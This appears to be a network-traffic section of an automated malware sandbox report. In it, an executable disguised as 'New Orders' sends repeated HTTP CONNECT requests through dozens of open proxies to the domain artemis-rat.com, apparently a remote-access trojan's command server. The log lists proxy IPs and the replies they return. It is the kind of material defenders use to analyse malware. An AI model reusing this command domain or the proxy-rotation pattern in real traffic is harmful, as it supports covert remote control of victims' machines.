                                                                                        Mar 11, 2024 16:16:42.858752966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.192399025 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        829192.168.2.949957103.76.253.6631297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.859956026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.960823059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070708990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.164048910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        830192.168.2.94994938.253.232.280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.860434055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.854782104 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        831192.168.2.952572104.25.231.184807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.860907078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.015211105 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        832192.168.2.95248918.169.83.8710807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.866523981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.156966925 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        833192.168.2.95135988.84.62.541537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.870452881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        834192.168.2.952465106.14.255.124807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.873337030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        835192.168.2.9524715.135.137.13591247672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.885761976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.663927078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.664180040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.664274931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.380109072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273472071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.976562023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        836192.168.2.951463192.163.200.82117207672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.898392916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.960823059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        837192.168.2.95139923.225.72.12535037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.902627945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.484977961 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        838192.168.2.95247078.30.128.1080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.903294086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        839192.168.2.95244861.178.152.3173027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.905587912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.277527094 CET90INHTTP/1.1 200 OK
                                                                                        Content-Type: application/json
                                                                                        Connection: close
                                                                                        Content-Length: 55


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        840192.168.2.952344197.254.84.86326507672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.906900883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.458718061 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        841192.168.2.9524995.61.33.234807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.930455923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.232125998 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        842192.168.2.950003185.200.37.24580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.968960047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.106511116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        843192.168.2.952500203.79.29.19811117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.974102020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        844192.168.2.952461183.215.23.24290917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.974277973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.348659039 CET325INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        845192.168.2.95255647.242.15.120156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.974448919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        846192.168.2.952560147.75.34.86100007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.974605083 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:43.280623913 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        847192.168.2.952466103.49.202.252807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.983504057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        848192.168.2.952580104.23.126.8807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.996510983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.150646925 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        849192.168.2.95238843.231.22.229807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.003634930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        850192.168.2.952467103.48.69.113827672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.003647089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.169380903 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        851192.168.2.95002467.43.236.20312957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.003724098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.465460062 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        852192.168.2.95002667.43.228.25339337672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.003760099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.711725950 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        853192.168.2.952473222.220.102.15980007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.003977060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        854192.168.2.95241060.12.168.11490027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.057497978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.559602022 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:55:27 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        855192.168.2.952562211.222.252.187807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.061861038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        856192.168.2.95143195.84.166.13880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
